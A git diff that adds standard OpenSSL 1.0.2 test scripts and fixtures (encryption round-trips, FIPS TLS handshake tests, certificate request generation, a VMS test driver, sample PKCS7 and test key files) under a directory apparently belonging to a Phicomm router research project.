diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testenc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testenc
new file mode 100644
index 0000000..d9fd52e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testenc
@@ -0,0 +1,54 @@
+#!/bin/sh
+
+testsrc=testenc
+test=./p
+cmd="../util/shlib_wrap.sh ../apps/openssl"
+
+cat $testsrc >$test;
+
+echo cat
+$cmd enc < $test > $test.cipher
+$cmd enc < $test.cipher >$test.clear
+cmp $test $test.clear
+if [ $? != 0 ]
+then
+	exit 1
+else
+	/bin/rm $test.cipher $test.clear
+fi
+echo base64
+$cmd enc -a -e < $test > $test.cipher
+$cmd enc -a -d < $test.cipher >$test.clear
+cmp $test $test.clear
+if [ $? != 0 ]
+then
+	exit 1
+else
+	/bin/rm $test.cipher $test.clear
+fi
+
+for i in `$cmd list-cipher-commands`
+do
+	echo $i
+	$cmd $i -bufsize 113 -e -k test < $test > $test.$i.cipher
+	$cmd $i -bufsize 157 -d -k test < $test.$i.cipher >$test.$i.clear
+	cmp $test $test.$i.clear
+	if [ $? != 0 ]
+	then
+		exit 1
+	else
+		/bin/rm $test.$i.cipher $test.$i.clear
+	fi
+
+	echo $i base64
+	$cmd $i -bufsize 113 -a -e -k test < $test > $test.$i.cipher
+	$cmd $i -bufsize 157 -a -d -k test < $test.$i.cipher >$test.$i.clear
+	cmp $test $test.$i.clear
+	if [ $? != 0 ]
+	then
+		exit 1
+	else
+		/bin/rm $test.$i.cipher $test.$i.clear
+	fi
+done
+rm -f $test
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testenc.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testenc.com
new file mode 100644
index 0000000..75acd6f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testenc.com
@@ -0,0 +1,66 @@
+$! TESTENC.COM  --  Test encoding and decoding
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p1 .eqs. 64) then __arch = __arch+ "_64"
+$
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$	testsrc = "makefile."
+$	test = "p.txt"
+$	cmd = "mcr ''exe_dir'openssl"
+$
+$	if f$search(test) .nes. "" then delete 'test';*
+$	convert/fdl=sys$input: 'testsrc' 'test'
+RECORD
+	FORMAT STREAM_LF
+$
+$	if f$search(test+"-cipher") .nes. "" then delete 'test'-cipher;*
+$	if f$search(test+"-clear") .nes. "" then delete 'test'-clear;*
+$
+$	write sys$output "cat"
+$	'cmd' enc -in 'test' -out 'test'-cipher
+$	'cmd' enc -in 'test'-cipher -out 'test'-clear
+$	backup/compare 'test' 'test'-clear
+$	if $severity .ne. 1 then exit 3
+$	delete 'test'-cipher;*,'test'-clear;*
+$
+$	write sys$output "base64"
+$	'cmd' enc -a -e -in 'test' -out 'test'-cipher
+$	'cmd' enc -a -d -in 'test'-cipher -out 'test'-clear
+$	backup/compare 'test' 'test'-clear
+$	if $severity .ne. 1 then exit 3
+$	delete 'test'-cipher;*,'test'-clear;*
+$
+$	define/user sys$output 'test'-cipher-commands
+$	'cmd' list-cipher-commands
+$	open/read f 'test'-cipher-commands
+$ loop_cipher_commands:
+$	read/end=loop_cipher_commands_end f i
+$	write sys$output i
+$
+$	if f$search(test+"-"+i+"-cipher") .nes. "" then -
+		delete 'test'-'i'-cipher;*
+$	if f$search(test+"-"+i+"-clear") .nes. "" then -
+		delete 'test'-'i'-clear;*
+$
+$	'cmd' 'i' -bufsize 113 -e -k test -in 'test' -out 'test'-'i'-cipher
+$	'cmd' 'i' -bufsize 157 -d -k test -in 'test'-'i'-cipher -out 'test'-'i'-clear
+$	backup/compare 'test' 'test'-'i'-clear
+$	if $severity .ne. 1 then exit 3
+$	delete 'test'-'i'-cipher;*,'test'-'i'-clear;*
+$
+$	write sys$output i," base64"
+$	'cmd' 'i' -bufsize 113 -a -e -k test -in 'test' -out 'test'-'i'-cipher
+$	'cmd' 'i' -bufsize 157 -a -d -k test -in 'test'-'i'-cipher -out 'test'-'i'-clear
+$	backup/compare 'test' 'test'-'i'-clear
+$	if $severity .ne. 1 then exit 3
+$	delete 'test'-'i'-cipher;*,'test'-'i'-clear;*
+$
+$	goto loop_cipher_commands
+$ loop_cipher_commands_end:
+$	close f
+$	delete 'test'-cipher-commands;*
+$	delete 'test';*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testfipsssl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testfipsssl
new file mode 100644
index 0000000..c4836ed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testfipsssl
@@ -0,0 +1,113 @@
+#!/bin/sh
+
+if [ "$1" = "" ]; then
+  key=../apps/server.pem
+else
+  key="$1"
+fi
+if [ "$2" = "" ]; then
+  cert=../apps/server.pem
+else
+  cert="$2"
+fi
+
+ciphers="DHE-RSA-AES256-SHA:DHE-DSS-AES256-SHA:AES256-SHA:EDH-RSA-DES-CBC3-SHA:EDH-DSS-DES-CBC3-SHA:DES-CBC3-SHA:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA:AES128-SHA:EXP1024-DHE-DSS-DES-CBC-SHA:EXP1024-DES-CBC-SHA:EDH-RSA-DES-CBC-SHA:EDH-DSS-DES-CBC-SHA:DES-CBC-SHA:EXP-EDH-RSA-DES-CBC-SHA:EXP-EDH-DSS-DES-CBC-SHA:EXP-DES-CBC-SHA"
+
+ssltest="../util/shlib_wrap.sh ./ssltest -F -key $key -cert $cert -c_key $key -c_cert $cert -cipher $ciphers"
+
+if ../util/shlib_wrap.sh ../apps/openssl x509 -in $cert -text -noout | fgrep 'DSA Public Key' >/dev/null; then
+  dsa_cert=YES
+else
+  dsa_cert=NO
+fi
+
+if [ "$3" = "" ]; then
+  CA="-CApath ../certs"
+else
+  CA="-CAfile $3"
+fi
+
+if [ "$4" = "" ]; then
+  extra=""
+else
+  extra="$4"
+fi
+
+#############################################################################
+
+echo test ssl3 is forbidden in FIPS mode
+$ssltest -ssl3 $extra && exit 1
+
+echo test ssl2 is forbidden in FIPS mode
+$ssltest -ssl2 $extra && exit 1
+
+echo test tls1
+$ssltest -tls1 $extra || exit 1
+
+echo test tls1 with server authentication
+$ssltest -tls1 -server_auth $CA $extra || exit 1
+
+echo test tls1 with client authentication
+$ssltest -tls1 -client_auth $CA $extra || exit 1
+
+echo test tls1 with both client and server authentication
+$ssltest -tls1 -server_auth -client_auth $CA $extra || exit 1
+
+echo test tls1 via BIO pair
+$ssltest -bio_pair -tls1 $extra || exit 1
+
+echo test tls1 with server authentication via BIO pair
+$ssltest -bio_pair -tls1 -server_auth $CA $extra || exit 1
+
+echo test tls1 with client authentication via BIO pair
+$ssltest -bio_pair -tls1 -client_auth $CA $extra || exit 1
+
+echo test tls1 with both client and server authentication via BIO pair
+$ssltest -bio_pair -tls1 -server_auth -client_auth $CA $extra || exit 1
+
+# note that all the below actually choose TLS...
+
+if [ $dsa_cert = NO ]; then
+  echo test sslv2/sslv3 w/o DHE via BIO pair
+  $ssltest -bio_pair -no_dhe $extra || exit 1
+fi
+
+echo test sslv2/sslv3 with 1024bit DHE via BIO pair
+$ssltest -bio_pair -dhe1024dsa -v $extra || exit 1
+
+echo test sslv2/sslv3 with server authentication
+$ssltest -bio_pair -server_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 with client authentication via BIO pair
+$ssltest -bio_pair -client_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 with both client and server authentication via BIO pair
+$ssltest -bio_pair -server_auth -client_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 with both client and server authentication via BIO pair and app verify
+$ssltest -bio_pair -server_auth -client_auth -app_verify $CA $extra || exit 1
+
+#############################################################################
+
+if ../util/shlib_wrap.sh ../apps/openssl no-dh; then
+  echo skipping anonymous DH tests
+else
+  echo test tls1 with 1024bit anonymous DH, multiple handshakes
+  $ssltest -v -bio_pair -tls1 -cipher ADH -dhe1024dsa -num 10 -f -time $extra || exit 1
+fi
+
+if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then
+  echo skipping RSA tests
+else
+  echo test tls1 with 1024bit RSA, no DHE, multiple handshakes
+  ../util/shlib_wrap.sh ./ssltest -v -bio_pair -tls1 -cert ../apps/server2.pem -no_dhe -num 10 -f -time $extra || exit 1
+
+  if ../util/shlib_wrap.sh ../apps/openssl no-dh; then
+    echo skipping RSA+DHE tests
+  else
+    echo test tls1 with 1024bit RSA, 1024bit DHE, multiple handshakes
+    ../util/shlib_wrap.sh ./ssltest -v -bio_pair -tls1 -cert ../apps/server2.pem -dhe1024dsa -num 10 -f -time $extra || exit 1
+  fi
+fi
+
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testgen b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testgen
new file mode 100644
index 0000000..524c0d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testgen
@@ -0,0 +1,44 @@
+#!/bin/sh
+
+T=testcert
+KEY=512
+CA=../certs/testca.pem
+
+/bin/rm -f $T.1 $T.2 $T.key
+
+if test "$OSTYPE" = msdosdjgpp; then
+    PATH=../apps\;$PATH;
+else
+    PATH=../apps:$PATH;
+fi
+export PATH
+
+echo "generating certificate request"
+
+echo "string to make the random number generator think it has entropy" >> ./.rnd
+
+if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then
+  req_new='-newkey dsa:../apps/dsa512.pem'
+else
+  req_new='-new'
+  echo "There should be a 2 sequences of .'s and some +'s."
+  echo "There should not be more that at most 80 per line"
+fi
+
+echo "This could take some time."
+
+rm -f testkey.pem testreq.pem
+
+../util/shlib_wrap.sh ../apps/openssl req -config test.cnf $req_new -out testreq.pem
+if [ $? != 0 ]; then
+echo problems creating request
+exit 1
+fi
+
+../util/shlib_wrap.sh ../apps/openssl req -config test.cnf -verify -in testreq.pem -noout
+if [ $? != 0 ]; then
+echo signature on req is wrong
+exit 1
+fi
+
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testgen.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testgen.com
new file mode 100644
index 0000000..e076da2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testgen.com
@@ -0,0 +1,58 @@
+$! TESTGEN.COM
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$	if (p1 .eqs. 64) then __arch = __arch+ "_64"
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	T = "testcert"
+$	KEY = 512
+$	CA = "[-.certs]testca.pem"
+$
+$	set noon
+$	if f$search(T+".1;*") .nes. "" then delete 'T'.1;*
+$	if f$search(T+".2;*") .nes. "" then delete 'T'.2;*
+$	if f$search(T+".key;*") .nes. "" then delete 'T'.key;*
+$	set on
+$
+$	write sys$output "generating certificate request"
+$
+$	append/new nl: .rnd
+$	open/append random_file .rnd
+$	write random_file -
+	 "string to make the random number generator think it has entropy"
+$	close random_file
+$
+$	set noon
+$	define/user sys$output nla0:
+$	mcr 'exe_dir'openssl no-rsa
+$	save_severity=$SEVERITY
+$	set on
+$	if save_severity
+$	then
+$	    req_new="-newkey dsa:[-.apps]dsa512.pem"
+$	else
+$	    req_new="-new"
+$	    write sys$output -
+	     "There should be a 2 sequences of .'s and some +'s."
+$	    write sys$output -
+	     "There should not be more that at most 80 per line"
+$	endif
+$
+$	write sys$output "This could take some time."
+$
+$	mcr 'exe_dir'openssl req -config test.cnf 'req_new' -out testreq.pem
+$	if $severity .ne. 1
+$	then
+$	    write sys$output "problems creating request"
+$	    exit 3
+$	endif
+$
+$	mcr 'exe_dir'openssl req -config test.cnf -verify -in testreq.pem -noout
+$	if $severity .ne. 1
+$	then
+$	    write sys$output "signature on req is wrong"
+$	    exit 3
+$	endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testp7.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testp7.pem
new file mode 100644
index 0000000..e5b7866
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testp7.pem
@@ -0,0 +1,46 @@
+-----BEGIN PKCS7-----
+MIIIGAYJKoZIhvcNAQcCoIIICTCCCAUCAQExADALBgkqhkiG9w0BBwGgggY8MIIE
+cjCCBBygAwIBAgIQeS+OJfWJUZAx6cX0eAiMjzANBgkqhkiG9w0BAQQFADBiMREw
+DwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xNDAyBgNV
+BAsTK1ZlcmlTaWduIENsYXNzIDEgQ0EgLSBJbmRpdmlkdWFsIFN1YnNjcmliZXIw
+HhcNOTYwNzE5MDAwMDAwWhcNOTcwMzMwMjM1OTU5WjCB1TERMA8GA1UEBxMISW50
+ZXJuZXQxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2ln
+biBDbGFzcyAxIENBIC0gSW5kaXZpZHVhbCBTdWJzY3JpYmVyMSgwJgYDVQQLEx9E
+aWdpdGFsIElEIENsYXNzIDEgLSBTTUlNRSBUZXN0MUcwRQYDVQQLEz53d3cudmVy
+aXNpZ24uY29tL3JlcG9zaXRvcnkvQ1BTLTEuMCBJbmMuIGJ5IFJlZi4sTElBQi5M
+VEQoYyk5NjBbMA0GCSqGSIb3DQEBAQUAA0oAMEcCQA7LvHEIAiQ5+4gDYvJGnGAq
+UM5GXyG11diEXmIEZTHUZhorooX5sr8IIjSXiPY59YYUFSvAaharFM1xaBN8zNEC
+AwEAAaOCAjkwggI1MAkGA1UdEwQCMAAwggImBgNVHQMEggIdMIICGTCCAhUwggIR
+BgtghkgBhvhFAQcBATCCAgAWggGrVGhpcyBjZXJ0aWZpY2F0ZSBpbmNvcnBvcmF0
+ZXMgYnkgcmVmZXJlbmNlLCBhbmQgaXRzIHVzZSBpcyBzdHJpY3RseSBzdWJqZWN0
+IHRvLCB0aGUgVmVyaVNpZ24gQ2VydGlmaWNhdGlvbiBQcmFjdGljZSBTdGF0ZW1l
+bnQgKENQUyksIGF2YWlsYWJsZSBhdDogaHR0cHM6Ly93d3cudmVyaXNpZ24uY29t
+L0NQUy0xLjA7IGJ5IEUtbWFpbCBhdCBDUFMtcmVxdWVzdHNAdmVyaXNpZ24uY29t
+OyBvciBieSBtYWlsIGF0IFZlcmlTaWduLCBJbmMuLCAyNTkzIENvYXN0IEF2ZS4s
+IE1vdW50YWluIFZpZXcsIENBIDk0MDQzIFVTQSBUZWwuICsxICg0MTUpIDk2MS04
+ODMwIENvcHlyaWdodCAoYykgMTk5NiBWZXJpU2lnbiwgSW5jLiAgQWxsIFJpZ2h0
+cyBSZXNlcnZlZC4gQ0VSVEFJTiBXQVJSQU5USUVTIERJU0NMQUlNRUQgYW5kIExJ
+QUJJTElUWSBMSU1JVEVELqAOBgxghkgBhvhFAQcBAQGhDgYMYIZIAYb4RQEHAQEC
+MC8wLRYraHR0cHM6Ly93d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvQ1BTLTEu
+AzANBgkqhkiG9w0BAQQFAANBAMCYDuSb/eIlYSxY31nZZTaCZkCSfHjlacMofExr
+cF+A2yHoEuT+eCQkqM0pMNHXddUeoQ9RjV+VuMBNmm63DUYwggHCMIIBbKADAgEC
+AhB8CYTq1bkRFJBYOd67cp9JMA0GCSqGSIb3DQEBAgUAMD4xCzAJBgNVBAYTAlVT
+MRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEWMBQGA1UECxMNVEVTVCBSb290IFBD
+QTAeFw05NjA3MTcwMDAwMDBaFw05NzA3MTcyMzU5NTlaMGIxETAPBgNVBAcTCElu
+dGVybmV0MRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVyaVNp
+Z24gQ2xhc3MgMSBDQSAtIEluZGl2aWR1YWwgU3Vic2NyaWJlcjBcMA0GCSqGSIb3
+DQEBAQUAA0sAMEgCQQDsVzrNgnDhbAJZrWeLd9g1vMZJA2W67D33TTbga6yMt+ES
+TWEywhS6RNP+fzLGg7utinjH4tL60cXa0G27GDsLAgMBAAGjIjAgMAsGA1UdDwQE
+AwIBBjARBglghkgBhvhCAQEEBAMCAgQwDQYJKoZIhvcNAQECBQADQQAUp6bRwkaD
+2d1MBs/mjUcgTI2fXVmW8tTm/Ud6OzUwpC3vYgybiOOA4f6mOC5dbyUHrLOsrihU
+47ZQ0Jo1DUfboYIBrTCBwTBtMA0GCSqGSIb3DQEBAgUAMD4xCzAJBgNVBAYTAlVT
+MRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEWMBQGA1UECxMNVEVTVCBSb290IFBD
+QRcNOTYwNzE3MTc0NDA5WhcNOTgwNzE3MDAwMDAwWjANBgkqhkiG9w0BAQIFAANB
+AHitA0/xAukCjHzeh1AMT/l2oC68N+yFb+aJPHBBMxc6gG2MaKjBNwb5hcXUllMl
+ExONA3ju10f7owIq3s3wx10wgeYwgZEwDQYJKoZIhvcNAQECBQAwYjERMA8GA1UE
+BxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTQwMgYDVQQLEytW
+ZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5kaXZpZHVhbCBTdWJzY3JpYmVyFw05NjA3
+MTcxNzU5MjlaFw05NzA3MTgwMDAwMDBaMA0GCSqGSIb3DQEBAgUAA0EAubVWYTsW
+sQmste9f+UgMw8BkjDlM25fwQLrCfmmnLxjewey10kSROypUaJLb+r4oRALc0fG9
+XfZsaiiIgotQHjEA
+-----END PKCS7-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testreq2.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testreq2.pem
new file mode 100644
index 0000000..c3cdcff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testreq2.pem
@@ -0,0 +1,7 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIHaMIGFAgEAMA4xDDAKBgNVBAMTA2NuNDBcMA0GCSqGSIb3DQEBAQUAA0sAMEgC
+QQCQsnkyUGDY2R3mYoeTprFJKgWuJ3f1jUjlIuW5+wfAUoeMt35c4vcFZ2mIBpEG
+DtzkNQN1kr2O9ldm9zYnYhyhAgMBAAGgEjAQBgorBgEEAYI3AgEOMQIwADANBgkq
+hkiG9w0BAQQFAANBAAb2szZgVIxg3vK6kYLjGSBISyuzcXJ6IvuPW6M+yzi1Qgoi
+gQhazHTJp91T8ItZEzUJGZSZl2e5iXlnffWB+/U=
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testrsa.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testrsa.pem
new file mode 100644
index 0000000..aad2106
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testrsa.pem
@@ -0,0 +1,9 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIBPAIBAAJBAKrbeqkuRk8VcRmWFmtP+LviMB3+6dizWW3DwaffznyHGAFwUJ/I
+Tv0XtbsCyl3QoyKGhrOAy3RvPK5M38iuXT0CAwEAAQJAZ3cnzaHXM/bxGaR5CR1R
+rD1qFBAVfoQFiOH9uPJgMaoAuoQEisPHVcZDKcOv4wEg6/TInAIXBnEigtqvRzuy
+oQIhAPcgZzUq3yVooAaoov8UbXPxqHlwo6GBMqnv20xzkf6ZAiEAsP4BnIaQTM8S
+mvcpHZwQJdmdHHkGKAs37Dfxi67HbkUCIQCeZGliHXFa071Fp06ZeWlR2ADonTZz
+rJBhdTe0v5pCeQIhAIZfkiGgGBX4cIuuckzEm43g9WMUjxP/0GlK39vIyihxAiEA
+mymehFRT0MvqW5xAKAx7Pgkt8HVKwVhc2LwGKHE0DZM=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tests.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tests.com
new file mode 100644
index 0000000..6e1c818
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tests.com
@@ -0,0 +1,397 @@
+$! TESTS.COM  --  Performs the necessary tests
+$!
+$! P1	tests to be performed.  Empty means all.
+$! P2	Pointer size: "", "32", or "64".
+$!
+$! Announce/identify.
+$!
+$	proc = f$environment( "procedure")
+$	write sys$output "@@@ "+ -
+	 f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$	__proc = f$element(0,";",f$environment("procedure"))
+$	__here = f$parse(f$parse("A.;",__proc) - "A.;","[]A.;") - "A.;"
+$	__save_default = f$environment("default")
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	__archd = __arch
+$       pointer_size = ""
+$	if (p2 .eq. "64")
+$	then
+$	  pointer_size = "64"
+$	  __archd = __arch+ "_64"
+$	endif
+$!
+$	texe_dir := sys$disk:[-.'__archd'.exe.test]
+$	exe_dir := sys$disk:[-.'__archd'.exe.apps]
+$
+$	set default '__here'
+$
+$       ROOT = F$PARSE("sys$disk:[-]A.;0",,,,"SYNTAX_ONLY,NO_CONCEAL") - "A.;0"
+$       ROOT_DEV = F$PARSE(ROOT,,,"DEVICE","SYNTAX_ONLY")
+$       ROOT_DIR = F$PARSE(ROOT,,,"DIRECTORY","SYNTAX_ONLY") -
+                   - ".][000000" - "[000000." - "][" - "[" - "]"
+$       ROOT = ROOT_DEV + "[" + ROOT_DIR
+$       DEFINE/NOLOG SSLROOT 'ROOT'.APPS.] /TRANS=CONC
+$	openssl_conf := sslroot:[000000]openssl-vms.cnf
+$
+$	on control_y then goto exit
+$	on error then goto exit
+$
+$	if p1 .nes. ""
+$	then
+$	    tests = p1
+$	else
+$! NOTE: This list reflects the list of dependencies following the
+$! "alltests" target in Makefile.  This should make it easy to see
+$! if there's a difference that needs to be taken care of.
+$	    tests := -
+	test_des,test_idea,test_sha,test_md4,test_md5,test_hmac,-
+	test_md2,test_mdc2,test_wp,-
+	test_rmd,test_rc2,test_rc4,test_rc5,test_bf,test_cast,test_aes,-
+	test_rand,test_bn,test_ec,test_ecdsa,test_ecdh,-
+	test_enc,test_x509,test_rsa,test_crl,test_sid,-
+	test_gen,test_req,test_pkcs7,test_verify,test_dh,test_dsa,-
+	test_ss,test_ca,test_engine,test_evp,test_ssl,test_tsa,test_ige,-
+	test_jpake,test_srp,test_cms,test_ocsp,test_v3name,test_heartbeat,-
+	test_constant_time
+$	endif
+$	tests = f$edit(tests,"COLLAPSE")
+$
+$	BNTEST :=	bntest
+$	ECTEST :=	ectest
+$	ECDSATEST :=	ecdsatest
+$	ECDHTEST :=	ecdhtest
+$	EXPTEST :=	exptest
+$	IDEATEST :=	ideatest
+$	SHATEST :=	shatest
+$	SHA1TEST :=	sha1test
+$	SHA256TEST :=	sha256t
+$	SHA512TEST :=	sha512t
+$	MDC2TEST :=	mdc2test
+$	RMDTEST :=	rmdtest
+$	MD2TEST :=	md2test
+$	MD4TEST :=	md4test
+$	MD5TEST :=	md5test
+$	HMACTEST :=	hmactest
+$	WPTEST :=	wp_test
+$	RC2TEST :=	rc2test
+$	RC4TEST :=	rc4test
+$	RC5TEST :=	rc5test
+$	BFTEST :=	bftest
+$	CASTTEST :=	casttest
+$	DESTEST :=	destest
+$	RANDTEST :=	randtest
+$	DHTEST :=	dhtest
+$	DSATEST :=	dsatest
+$	METHTEST :=	methtest
+$	SSLTEST :=	ssltest
+$	RSATEST :=	rsa_test
+$	ENGINETEST :=	enginetest
+$	EVPTEST :=	evp_test
+$	IGETEST :=	igetest
+$	JPAKETEST :=	jpaketest
+$	SRPTEST :=	srptest
+$	V3NAMETEST :=	v3nametest
+$	ASN1TEST :=	asn1test
+$	HEARTBEATTEST :=	heartbeat_test
+$	CONSTTIMETEST :=	constant_time_test
+$!
+$	tests_i = 0
+$ loop_tests:
+$	tests_e = f$element(tests_i,",",tests)
+$	tests_i = tests_i + 1
+$	if tests_e .eqs. "," then goto exit
+$	write sys$output "---> ''tests_e'"
+$	gosub 'tests_e'
+$	goto loop_tests
+$
+$ test_evp:
+$	mcr 'texe_dir''evptest' 'ROOT'.CRYPTO.EVP]evptests.txt
+$	return
+$ test_des:
+$	mcr 'texe_dir''destest'
+$	return
+$ test_idea:
+$	mcr 'texe_dir''ideatest'
+$	return
+$ test_sha:
+$	mcr 'texe_dir''shatest'
+$	mcr 'texe_dir''sha1test'
+$	mcr 'texe_dir''sha256test'
+$	mcr 'texe_dir''sha512test'
+$	return
+$ test_mdc2:
+$	mcr 'texe_dir''mdc2test'
+$	return
+$ test_md5:
+$	mcr 'texe_dir''md5test'
+$	return
+$ test_md4:
+$	mcr 'texe_dir''md4test'
+$	return
+$ test_hmac:
+$	mcr 'texe_dir''hmactest'
+$	return
+$ test_wp:
+$	mcr 'texe_dir''wptest'
+$	return
+$ test_md2:
+$	mcr 'texe_dir''md2test'
+$	return
+$ test_rmd:
+$	mcr 'texe_dir''rmdtest'
+$	return
+$ test_bf:
+$	mcr 'texe_dir''bftest'
+$	return
+$ test_cast:
+$	mcr 'texe_dir''casttest'
+$	return
+$ test_rc2:
+$	mcr 'texe_dir''rc2test'
+$	return
+$ test_rc4:
+$	mcr 'texe_dir''rc4test'
+$	return
+$ test_rc5:
+$	mcr 'texe_dir''rc5test'
+$	return
+$ test_rand:
+$	mcr 'texe_dir''randtest'
+$	return
+$ test_enc:
+$	@testenc.com 'pointer_size'
+$	return
+$ test_x509:
+$	set noon
+$	define sys$error test_x509.err
+$	write sys$output "test normal x509v1 certificate"
+$	@tx509.com "" 'pointer_size'
+$	write sys$output "test first x509v3 certificate"
+$	@tx509.com v3-cert1.pem 'pointer_size'
+$	write sys$output "test second x509v3 certificate"
+$	@tx509.com v3-cert2.pem 'pointer_size'
+$	deassign sys$error
+$	set on
+$	return
+$ test_rsa:
+$	set noon
+$	define sys$error test_rsa.err
+$	@trsa.com "" 'pointer_size'
+$	deassign sys$error
+$	mcr 'texe_dir''rsatest'
+$	set on
+$	return
+$ test_crl:
+$	set noon
+$	define sys$error test_crl.err
+$	@tcrl.com "" 'pointer_size'
+$	deassign sys$error
+$	set on
+$	return
+$ test_sid:
+$	set noon
+$	define sys$error test_sid.err
+$	@tsid.com "" 'pointer_size'
+$	deassign sys$error
+$	set on
+$	return
+$ test_req:
+$	set noon
+$	define sys$error test_req.err
+$	@treq.com "" 'pointer_size'
+$	@treq.com testreq2.pem 'pointer_size'
+$	deassign sys$error
+$	set on
+$	return
+$ test_pkcs7:
+$	set noon
+$	define sys$error test_pkcs7.err
+$	@tpkcs7.com "" 'pointer_size'
+$	@tpkcs7d.com "" 'pointer_size'
+$	deassign sys$error
+$	set on
+$	return
+$ test_bn:
+$	write sys$output -
+	      "starting big number library test, could take a while..."
+$	set noon
+$	define sys$error test_bn.err
+$	define sys$output test_bn.out
+$	@ bctest.com
+$	status = $status
+$	deassign sys$error
+$	deassign sys$output
+$	set on
+$	if (status)
+$	then
+$	    create /fdl = sys$input bntest-vms.tmp
+FILE
+	ORGANIZATION	sequential
+RECORD
+	FORMAT		stream_lf
+$	    define /user_mode sys$output bntest-vms.tmp
+$	    mcr 'texe_dir''bntest'
+$	    define /user_mode sys$input bntest-vms.tmp
+$	    define /user_mode sys$output bntest-vms.out
+$	    bc
+$	    @ bntest.com bntest-vms.out
+$	    status = $status
+$	    if (status)
+$	    then
+$		delete bntest-vms.out;*
+$		delete bntest-vms.tmp;*
+$	    endif
+$	else
+$	    create /fdl = sys$input bntest-vms.sh
+FILE
+	ORGANIZATION	sequential
+RECORD
+	FORMAT		stream_lf
+$	    open /append bntest_file bntest-vms.sh
+$	    type /output = bntest_file sys$input:
+<< __FOO__ sh -c "`sh ./bctest`" | perl -e '$i=0; while (<STDIN>) {if (/^test (.*)/) {print STDERR "\nverify $1";} elsif (!/^0$/) {die "\nFailed! bc: $_";} else {print STDERR "."; $i++;}} print STDERR "\n$i tests passed\n"'
+$	    define /user_mode sys$output bntest-vms.tmp
+$	    mcr 'texe_dir''bntest'
+$	    copy bntest-vms.tmp bntest_file
+$	    delete bntest-vms.tmp;*
+$	    type /output = bntest_file sys$input:
+__FOO__
+$	    close bntest_file
+$	    write sys$output "-- copy the [.test]bntest-vms.sh and [.test]bctest files to a Unix system and"
+$	    write sys$output "-- run bntest-vms.sh through sh or bash to verify that the bignum operations"
+$	    write sys$output "-- went well."
+$	    write sys$output ""
+$	endif
+$	write sys$output "test a^b%c implementations"
+$	mcr 'texe_dir''exptest'
+$	return
+$ test_ec:
+$	write sys$output "test elliptic curves"
+$	mcr 'texe_dir''ectest'
+$	return
+$ test_ecdsa:
+$	write sys$output "test ecdsa"
+$	mcr 'texe_dir''ecdsatest'
+$	return
